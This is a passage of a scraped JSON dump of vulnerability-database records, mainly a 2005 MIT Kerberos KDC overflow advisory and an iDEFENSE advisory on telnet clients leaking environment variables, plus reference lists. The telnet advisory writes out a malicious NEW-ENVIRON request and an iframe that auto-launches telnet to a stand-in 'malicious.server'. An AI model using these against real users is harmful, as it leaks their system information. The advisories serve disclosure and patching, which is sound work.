in all MIT krb5 releases, up to and including krb5-1.4.1.\r\n Third-party application servers which use MIT krb5 are also\r\n affected.\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.4.2 release will have fixes for these\r\n vulnerabilities.\r\n\r\n* WORKAROUNDS: Disabling TCP support in the KDC avoids one\r\n vulnerability [CAN-2005-1174]. The single-byte overflow\r\n [CAN-2005-1175] is still possible even without KDC TCP support\r\n enabled. Running the KDC from init or from some similar automatic\r\n respawning facility may reduce the durations of denials of service,\r\n but this approach may make it difficult to detect deliberate attacks\r\n targeted at code execution.\r\n\r\n* Apply the patch at:\r\n\r\n http://web.mit.edu/kerberos/advisories/2005-002-patch_1.4.1.txt\r\n\r\n The associated detached PGP signature is at:\r\n\r\n http://web.mit.edu/kerberos/advisories/2005-002-patch_1.4.1.txt.asc\r\n\r\n The patch was generated against the krb5-1.4.1 release. It may\r\n apply, with some offset, to earlier releases. On releases prior to\r\n krb5-1.3, only the patch to lib/krb5/krb/unparse.c should be\r\n necessary.\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CAN-2005-1174\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1174\r\n\r\nCERT: VU#259798\r\nhttp://www.kb.cert.org/vuls/id/259798\r\n\r\nCVE: CAN-2005-1175\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1175\r\n\r\nCERT: VU#885830\r\nhttp://www.kb.cert.org/vuls/id/885830\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThanks to Daniel Wachdorf for reporting these vulnerabilities.\r\n\r\nDETAILS\r\n=======\r\n\r\nKerberos 5 principal names may have an arbitrary number of components.\r\nThe krb5_unparse_name&#40;&#41; function in the MIT krb5 library converts an\r\ninternal representation of a Kerberos principal name into a\r\nhuman-readable string. The internal representation might have\r\noriginated from the decoding of a Kerberos protocol message.\r\n\r\nThe single-byte overflow occurs whenever the krb5_unparse_name&#40;&#41;\r\nfunction is called on a principal name having zero components. The\r\nfunction writes a null byte to an address one beyond the end of a\r\nbuffer allocated my malloc&#40;&#41;. The corresponding krb5_parse_name&#40;&#41;\r\nfunction never generates an internal representation having zero\r\ncomponents; instead, it generates at least one zero-length component.\r\nThe current string representation form of Kerberos principal names has\r\nsome ambiguity between a zero-component principal name and a\r\none-component principal name having a zero-length single component.\r\n\r\nApplication servers which call krb5_unparse_name&#40;&#41;, directly or\r\nindirectly, are vulnerable to the single-byte overflow in\r\nkrb5_unparse_name&#40;&#41;, provided that the attacker controls a realm which\r\nshares a cross-realm key with the target realm. This enables the\r\nattacker to use a cross-realm ticket for a zero-component client\r\nprincipal name, which the application server will then pass to\r\nkrb5_unparse_name&#40;&#41;, triggering the single-byte overflow.\r\n\r\nFor this attack to succeed, the attacker needs access to a KDC in the\r\ntarget realm which will create a ticket for a zero-component client\r\nprincipal name. Since the current MIT krb5 KDC implementation will\r\nrefuse to create such a ticket, the attack is unlikely to succeed\r\nunless the implementation has been altered to allow the issuance of\r\ntickets for zero-component client principal names.\r\n\r\nWhen the KDC fails to find the principal with a zero-component name in\r\nits database &#40;such a principal is very unlikely to exist in most\r\ndatabases, as there are extremely few uses for such a principal&#41;, it\r\nattempts to encode an error packet containing the offending principal\r\nname, using prepare_error_as&#40;&#41; or prepare_error_tgs&#40;&#41;. This encoding\r\nattempt fails inside encode_krb5_error&#40;&#41;, since the ASN.1 encoder\r\nfunction asn1_encode_principal_name&#40;&#41; interprets the internal\r\nrepresentation of a zero-component principal name as an error\r\ncondition.\r\n\r\nencode_krb5_error&#40;&#41; does not allocate an output buffer when it\r\nencounters an error condition. While the UDP request handling code in\r\nkdc/network.c:process_packet&#40;&#41; does not attempt to free the output\r\nbuffer containing the encoded message when it encounters an error, the\r\nTCP request handling code in process does free the buffer inside\r\nkill_tcp_connection&#40;&#41;, which attempts to free unallocated memory\r\npointed to by an uninitialized pointer.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2005-05-12 original release\r\n\r\nCopyright &#40;C&#41; 2005 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.5 &#40;SunOS&#41;\r\n\r\niQCVAwUBQtMbCabDgE/zdoE9AQFo9QP5AZMbr0YGmyzYbARTqFq+Lt+FYbfQ7XC/\r\nc1hqTfsTkN0Mfh1I5d6dTjhXQT6kfN+EdNYfPhY+4LANB5CW9xe9BARPcW9i2ftt\r\nxSTIODrD6LdNtOCCut1ha3T5tcV5GodvXzj7dSClde29j0IJR6dBcigfvR4mAygw\r\n/U7r46obgM0=\r\n=SnqK\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2005-07-13T00:00:00", "published": "2005-07-13T00:00:00", "id": "SECURITYVULNS:DOC:9151", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9151", "title": "MITKRB5-SA-2005-002: buffer overflow, heap corruption in KDC", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-0488", "CVE-2005-1205"], "description": "Multiple Vendor Telnet Client Information Disclosure Vulnerability\r\n\r\niDEFENSE Security Advisory 06.14.05\r\nwww.idefense.com/application/poi/display?id=260&type=vulnerabilities\r\nJune 14, 2005\r\n\r\nI. BACKGROUND\r\n\r\nThe TELNET protocol allows virtual network terminals to be connected to \r\nover the internet. The initial description of the telnet protocol was \r\ngiven in RFC854 in May 1983. Since then there have been many extra \r\nfeatures added including encryption. \r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of an input validation error in multiple telnet \r\nclients could allow an attacker to gain sensitive information about the \r\nvictim&#39;s system.\r\n\r\nThe vulnerability specifically exists in the handling of the NEW-ENVIRON \r\ncommand.\r\n\r\nIn order to exploit this vulnerability, a malicious server can send a \r\nconnected client the following telnet command:\r\n\r\nSB NEW-ENVIRON SEND ENV_USERVAR &lt;name of environment variable&gt; SE\r\n\r\nVulnerable telnet clients will send the contents of the reference \r\nenvironment variable, which may contain information useful to an \r\nattacker. The expected behavior would be only to send environment \r\nvariables related directly to the operation of the telnet client &#40;for \r\nexample, TERM&#41;, or those specifically allowed by the user.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation of the vulnerability would allow an attacker to \r\nread the values of arbitrary environment variables. By itself this \r\nvulnerability is not a large threat, but exploiting this vulnerability \r\nmay give an attacker more information about a targeted system, which \r\ncould allow more effective attacks.\r\n\r\nIn order to exploit this vulnerability, an attacker would need to \r\nconvince the user to connect to their malicious server. It may be \r\npossible to automatically launch the telnet command from a web page, for \r\nexample\r\n\r\n&lt;html&gt;&lt;body&gt;\r\n&lt;iframe src=&#39;telnet://malicious.server/&#39;&gt;\r\n&lt;/body&gt;\r\n\r\nOn opening this page the telnet client may be launched and attempt to \r\nconnect to the host &#39;malicious.server&#39;.\r\n\r\nIV. DETECTION\r\n\r\niDEFENSE has confirmed the existence of the vulnerability in version \r\n5.1.2600.2180 of the Microsoft Telnet Client, the telnet client included \r\nin the Kerberos V5 Release 1.3.6 package and the client included in the \r\nSUNWtnetc package of Solaris 5.9. It is suspected that most BSD based \r\ntelnet clients are affected by this vulnerability. The telnet client \r\nfrom the netkit-telnet package distributed with all current versions of \r\nRedhat Linux contains a patch for this vulnerability, introduced in \r\nearly 2000. Some other distributions may also contain this patch. There \r\ndoes not appear to have been a security advisory released at the time\r\nthe patch was added, nor does there appear to be an entry in the\r\nBugzilla database. This issue appears to have been mentioned in passing\r\nin RHSA-2000-028, in relation to a vulnerability in Netscape.\r\n\r\nV. WORKAROUND\r\n\r\nFor Windows based platforms, disabling the Telnet handler or specifying \r\na different application to handle Telnet URL&#39;s can mitigate URL based \r\nattacks. This can be accomplished by removing or modifying the following \r\nregistry key:\r\n\r\nHKEY_CLASSES_ROOT&#92;telnet&#92;shell&#92;open&#92;command\r\n\r\nThis workaround should prevent automatic exploitation attempts. It does \r\nnot fix the underlying issue. \r\n\r\niDEFENSE is currently unaware of any workarounds for this issue for other \r\naffected platforms.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nVulnerable:\r\n\r\n- Microsoft Corp.\r\n\r\nMicrosoft has investigated this issue. We have released an update to\r\naddress this concern. For more information, visit the following Web\r\nSite: http://go.microsoft.com/fwlink/?linkid=47016\r\n\r\n- MIT Kerberos\r\n\r\nThe MIT Kerberos Development Team believes that the telnet client in our\r\ndistribution behaves as intended with regards to its handling of the\r\nNEW-ENVIRON option. We do not feel that disclosure of user environment\r\nvariable settings constitutes a significant exposure.\r\n\r\nWe are willing to consider patches which implement an option to restrict\r\nor disable the transmission of environment variables by the telnet\r\nclient.\r\n\r\n- Sun Microsystems, Inc.\r\n\r\nSun Microsystems, Inc. can confirm that Solaris and the SEAM product are\r\naffected by this issue. The impact, contributing factors and patch\r\ndetails are available in Sun Alert 57755 for Solaris which is available\r\nhere:\r\n\r\n http://sunsolve.sun.com/search/document.do?assetkey=1-26-57755-1\r\n\r\nand Sun Alert 57761 for SEAM which is available here:\r\n\r\n http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1\r\n\r\n- SUSE LINUX\r\n\r\nThe updates will be released on the coordinated release date. Customers\r\nof SUSE LINUX can download the package by using YOU or directly via FTP\r\nfrom our servers.\r\n\r\n\r\nNot Vulnerable:\r\n\r\n- ALT Linux\r\n\r\nALT Linux is not vulnerable to the telnet environment variable\r\ndisclosure since February of 2002, due to our inclusion of the Red Hat\r\nLinux derived patch from Openwall GNU/*/Linux.\r\n\r\n- CyberSafe Ltd.\r\n\r\nThe TrustBroker Secure Connection Utilities and TrustBroker Secure\r\nConnection Services, version 5.6.1 or later, are not effected by this\r\nvulnerability. If you are using earlier releases of these products you\r\nneed to upgrade.\r\n\r\n- Openwall Project\r\n\r\nOpenwall GNU/*/Linux is not vulnerable to the telnet environment\r\nvariable disclosure, and it never was due to our inclusion of the Red\r\nHat Linux derived patch in the very first publicly available version of\r\nour telnet package &#40;which was in other aspects based off the code found\r\nin OpenBSD 3.0&#41;. It is, however, worth noting that the unsafe\r\nenvironment variable disclosure was in fact documented in the BSD telnet\r\nclient manual page. Thus, now that this issue has been revisited, we\r\nhave reworked the environment variable restrictions patch to have our\r\ndocumentation in sync with the actual behavior.\r\n\r\n- Ubuntu\r\n\r\nUbuntu supports and ships netkit-telnet, which has been patched to not\r\ndisclose arbitrary environment variables for a long time now. The krb5\r\nversion is also available in the archive, however, it is unsupported and\r\nthere will not be an official advisory for it. It will most likely be\r\nfixed by the community.\r\n\r\n- WRQ, Inc.\r\n\r\nNo versions of the WRQ Reflection for the Web Telnet clients are\r\nvulnerable as they return very limited terminal information in response\r\nto the NEW_ENVIRONMENT command and use dynamically-sized buffering.\r\nSecurity update and advisory information for WRQ Reflection for the Web\r\ncan be found at:\r\n \r\n http://support.wrq.com/techdocs/1704.html\r\n\r\nNo versions of the WRQ Reflection Telnet, TN3270, TN3270E, TN5250 or\r\nKerberized Telnet clients are vulnerable as they are not based on either\r\nthe BSD or MIT Telnet clients and use Microsoft Windows memory\r\nmanagement routines along with compile-time buffer overflow protection.\r\nSecurity update and advisory information for WRQ Reflection products can\r\nbe found at:\r\n\r\n http://support.wrq.com/techdocs/1708.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned the\r\nname CAN-2005-0488 to this issue. The CVE Project has also assigned\r\nCAN-2005-1205 to identify this issue in Microsoft products. A separate\r\nCVE number was issued for Microsoft due to the differing code base used.\r\nThese are candidates for inclusion in the CVE list\r\n&#40;http://cve.mitre.org&#41;, which standardizes names for security problems.\r\n\r\nAdditionally, CERT has issued VU#800829 for this vulnerability.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n02/18/2005 Initial vendor notification\r\n06/14/2005 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nGa&#235;l Delalleau is credited with this discovery.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2005 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n", "edition": 1, "modified": "2005-06-15T00:00:00", "published": "2005-06-15T00:00:00", "id": "SECURITYVULNS:DOC:8858", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8858", "title": "iDEFENSE Security Advisory 06.14.05: Multiple Vendor Telnet Client Information Disclosure Vulnerability", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-1175"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg1IY85474)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2005/dsa-757)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=302163)\nSecurity Tracker: 1014460\n[Secunia Advisory ID:16050](https://secuniaresearch.flexerasoftware.com/advisories/16050/)\n[Secunia Advisory ID:16341](https://secuniaresearch.flexerasoftware.com/advisories/16341/)\n[Secunia Advisory ID:16449](https://secuniaresearch.flexerasoftware.com/advisories/16449/)\n[Secunia Advisory ID:17135](https://secuniaresearch.flexerasoftware.com/advisories/17135/)\n[Secunia Advisory ID:16060](https://secuniaresearch.flexerasoftware.com/advisories/16060/)\n[Secunia Advisory ID:16086](https://secuniaresearch.flexerasoftware.com/advisories/16086/)\n[Secunia Advisory ID:16041](https://secuniaresearch.flexerasoftware.com/advisories/16041/)\n[Secunia Advisory ID:16034](https://secuniaresearch.flexerasoftware.com/advisories/16034/)\n[Secunia Advisory ID:17899](https://secuniaresearch.flexerasoftware.com/advisories/17899/)\n[Secunia Advisory ID:16052](https://secuniaresearch.flexerasoftware.com/advisories/16052/)\n[Secunia Advisory ID:16054](https://secuniaresearch.flexerasoftware.com/advisories/16054/)\n[Secunia Advisory ID:16057](https://secuniaresearch.flexerasoftware.com/advisories/16057/)\n[Secunia Advisory ID:16413](https://secuniaresearch.flexerasoftware.com/advisories/16413/)\n[Secunia Advisory ID:20364](https://secuniaresearch.flexerasoftware.com/advisories/20364/)\n[Related OSVDB ID: 1001065](https://vulners.com/osvdb/OSVDB:1001065)\n[Related OSVDB ID: 17842](https://vulners.com/osvdb/OSVDB:17842)\nRedHat RHSA: RHSA-2005:567\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Jul/0004.html\nOther Advisory URL: http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-002-kdc.txt\nOther Advisory URL: http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-003-recvauth.txt\nOther Advisory URL: http://www.debian.org/security/2005/dsa-773\nOther Advisory URL: http://www.ubuntulinux.org/usn/usn-224-1\nOther Advisory URL: http://lists.trustix.org/pipermail/tsl-announce/2005-July/000330.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051002-01-U.asc\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200507-11.xml\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101809-1\nOther Advisory URL: http://frontal1.mandriva.com/security/advisories?name=MDKSA-2005:119\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000993\nGeneric Informational URL: http://news.com.com/Apple+unloads+dozens+of+fixes+for+OS+X/2100-1002_3-5834873.html\n[CVE-2005-1175](https://vulners.com/cve/CVE-2005-1175)\nCERT VU: 885830\n", "modified": "2005-07-12T00:00:00", "published": "2005-07-12T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:17843", "id": "OSVDB:17843", "title": "Kerberos Key Distribution Center (KDC) krb5_unparse_name Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-1689"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.debian.org/security/2005/dsa-757)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=302163)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00768776)\nSecurity Tracker: 1014461\n[Secunia Advisory ID:16050](https://secuniaresearch.flexerasoftware.com/advisories/16050/)\n[Secunia Advisory ID:16341](https://secuniaresearch.flexerasoftware.com/advisories/16341/)\n[Secunia Advisory ID:16449](https://secuniaresearch.flexerasoftware.com/advisories/16449/)\n[Secunia Advisory ID:17135](https://secuniaresearch.flexerasoftware.com/advisories/17135/)\n[Secunia Advisory ID:16086](https://secuniaresearch.flexerasoftware.com/advisories/16086/)\n[Secunia Advisory ID:16041](https://secuniaresearch.flexerasoftware.com/advisories/16041/)\n[Secunia Advisory ID:16061](https://secuniaresearch.flexerasoftware.com/advisories/16061/)\n[Secunia Advisory ID:16034](https://secuniaresearch.flexerasoftware.com/advisories/16034/)\n[Secunia Advisory ID:17899](https://secuniaresearch.flexerasoftware.com/advisories/17899/)\n[Secunia Advisory ID:16057](https://secuniaresearch.flexerasoftware.com/advisories/16057/)\n[Secunia Advisory ID:16052](https://secuniaresearch.flexerasoftware.com/advisories/16052/)\n[Secunia Advisory ID:16054](https://secuniaresearch.flexerasoftware.com/advisories/16054/)\n[Secunia Advisory ID:16413](https://secuniaresearch.flexerasoftware.com/advisories/16413/)\n[Secunia Advisory ID:22090](https://secuniaresearch.flexerasoftware.com/advisories/22090/)\n[Related OSVDB ID: 17843](https://vulners.com/osvdb/OSVDB:17843)\n[Related OSVDB ID: 17842](https://vulners.com/osvdb/OSVDB:17842)\nRedHat RHSA: RHSA-2005:567\nOther Advisory URL: http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-002-kdc.txt\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Jul/0004.html\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101810-1\nOther Advisory URL: http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-003-recvauth.txt\nOther Advisory URL: http://www.debian.org/security/2005/dsa-773\nOther Advisory URL: http://www.ubuntulinux.org/usn/usn-224-1\nOther Advisory URL: http://lists.trustix.org/pipermail/tsl-announce/2005-July/000330.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051002-01-U.asc\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200507-11.xml\nOther Advisory URL: http://frontal1.mandriva.com/security/advisories?name=MDKSA-2005:119\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000993\nKeyword: HPSBUX02152,SSRT5973\nGeneric Informational URL: http://news.com.com/Apple+unloads+dozens+of+fixes+for+OS+X/2100-1002_3-5834873.html\n[CVE-2005-1689](https://vulners.com/cve/CVE-2005-1689)\nCERT VU: 623332\n", "modified": "2005-07-12T00:00:00", "published": "2005-07-12T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:17841", "id": "OSVDB:17841", "title": "MIT Kerberos kpropd krb5_recvauth Double Free Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:04", "bulletinFamily": "software", "cvelist": ["CVE-2004-0175"], "edition": 1, "description": "## Vulnerability Description\nOpenSSH contains a flaw that may allow a context-dependent attacker to overwrite arbitrary files on a remote system. The issue is due to the scp utility not properly sanitizing file copy requests which could allow a remote server to overwrite arbitrary files on the target system.\n## Solution Description\nUpgrade to version 3.4p1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nOpenSSH contains a flaw that may allow a context-dependent attacker to overwrite arbitrary files on a remote system. The issue is due to the scp utility not properly sanitizing file copy requests which could allow a remote server to overwrite arbitrary files on the target system.\n## References:\nVendor Specific News/Changelog Entry: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=120147\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20041101-01-P.asc)\n[Vendor Specific Advisory URL](http://frontal1.mandriva.com/security/advisories?name=MDKSA-2005:100)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-167.pdf)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=120147)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000831)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_09_kernel.html)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.11/SCOSA-2006.11.txt)\n[Vendor Specific Advisory URL](http://www.juniper.net/support/security/alerts/adv59739.txt)\nSecurity Tracker: 1011193\nSecurity Tracker: 1011144\n[Secunia Advisory ID:17135](https://secuniaresearch.flexerasoftware.com/advisories/17135/)\n[Secunia Advisory ID:19243](https://secuniaresearch.flexerasoftware.com/advisories/19243/)\n[Secunia Advisory ID:15414](https://secuniaresearch.flexerasoftware.com/advisories/15414/)\n[Secunia Advisory ID:15418](https://secuniaresearch.flexerasoftware.com/advisories/15418/)\n[Secunia Advisory ID:15920](https://secuniaresearch.flexerasoftware.com/advisories/15920/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:12450](https://secuniaresearch.flexerasoftware.com/advisories/12450/)\n[Secunia Advisory ID:16034](https://secuniaresearch.flexerasoftware.com/advisories/16034/)\n[Secunia Advisory ID:16622](https://secuniaresearch.flexerasoftware.com/advisories/16622/)\n[Secunia Advisory ID:16057](https://secuniaresearch.flexerasoftware.com/advisories/16057/)\n[Secunia Advisory ID:16054](https://secuniaresearch.flexerasoftware.com/advisories/16054/)\nRedHat RHSA: RHSA-2005:567\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2005:100\nOther Advisory URL: http://www.trustix.org/errata/2005/0031/\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051002-01-U.asc\nOther Advisory URL: http://www.juniper.net/support/security/alerts/adv59739.txt\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2005-106.html\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2005-074.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 16323\n[CVE-2004-0175](https://vulners.com/cve/CVE-2004-0175)\nBugtraq ID: 9986\n", "modified": "2004-04-06T07:31:22", "published": "2004-04-06T07:31:22", "id": "OSVDB:9550", "href": "https://vulners.com/osvdb/OSVDB:9550", "title": "OpenSSH scp Traversal Arbitrary File Overwrite", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-0488", "CVE-2005-1205"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-57755-1)\n[Vendor Specific Advisory URL](http://support.wrq.com/techdocs/1704.html)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-145_RHSA-2005-504.pdf)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=304063)\nSecurity Tracker: 1014203\n[Secunia Advisory ID:15690](https://secuniaresearch.flexerasoftware.com/advisories/15690/)\n[Secunia Advisory ID:15820](https://secuniaresearch.flexerasoftware.com/advisories/15820/)\n[Secunia Advisory ID:17135](https://secuniaresearch.flexerasoftware.com/advisories/17135/)\n[Secunia Advisory ID:15741](https://secuniaresearch.flexerasoftware.com/advisories/15741/)\n[Secunia Advisory ID:15713](https://secuniaresearch.flexerasoftware.com/advisories/15713/)\n[Secunia Advisory ID:21253](https://secuniaresearch.flexerasoftware.com/advisories/21253/)\n[Secunia Advisory ID:15709](https://secuniaresearch.flexerasoftware.com/advisories/15709/)\n[Secunia Advisory ID:16651](https://secuniaresearch.flexerasoftware.com/advisories/16651/)\nRedHat RHSA: RHSA-2005:504\nOther Advisory URL: http://www.trustix.org/errata/2005/0029/\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.35/SCOSA-2005.35.txt\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_16_sr.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051002-01-U.asc\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities\nMicrosoft Security Bulletin: MS05-033\nMicrosoft Knowledge Base Article: 896428\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0172.html\n[CVE-2005-1205](https://vulners.com/cve/CVE-2005-1205)\n[CVE-2005-0488](https://vulners.com/cve/CVE-2005-0488)\nCERT VU: 800829\n", "modified": "2005-06-14T15:10:23", "published": "2005-06-14T15:10:23", "href": "https://vulners.com/osvdb/OSVDB:17303", "id": "OSVDB:17303", "title": "Multiple Vendor Telnet Client NEW-ENVIRON Variable Information Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "f5": [{"lastseen": "2020-03-27T02:45:59", "bulletinFamily": "software", "cvelist": ["CVE-2005-0488"], "description": "", "edition": 1, "modified": "2018-07-03T23:29:00", "published": "2005-07-22T04:00:00", "id": "F5:K4616", "href": "https://support.f5.com/csp/article/K4616", "title": "BSD telnet environment vulnerability CAN-2005-0488", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:21", "bulletinFamily": "software", "cvelist": ["CVE-2005-0488"], "edition": 1, "description": "#### Was this resource helpful in solving your issue?\n\nYes - this resource was helpful \nNo - this resource was not helpful \nI don\u0091t know yet \n\n\nNOTE: Please do not provide personal information.\n\n \n \n\n\n#### Incorrect answer. Please try again: Please enter the words to the right: Please enter the numbers you hear: \n", "modified": "2016-07-25T00:00:00", "published": "2005-07-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/4000/600/sol4616.html", "id": "SOL4616", "title": "SOL4616 - BSD telnet environment vulnerability CAN-2005-0488", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:50:35", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0991", "CVE-2004-0113", "CVE-2004-0179", "CVE-2004-0174", "CVE-2004-0153", "CVE-2004-0175", "CVE-2003-0020", "CVE-2004-0152", "CVE-2004-0181", "CVE-2004-0109"], "description": "iDEFENSE Inc. informed us about a buffer overflow in the linux 2.4 kernel code which handles ISO9660 filesystems. The original code is not able to handle very long symlink names. The vulnerability can be triggered locally by mounting removable media that contains a malformed filesystem or by using the loopback device. Exploiting this buffer overflow results in kernel-level access to the system.", "edition": 1, "modified": "2004-04-14T15:46:44", "published": "2004-04-14T15:46:44", "id": "SUSE-SA:2004:009", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-04/msg00004.html", "title": "local privilege escalation in Linux Kernel", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}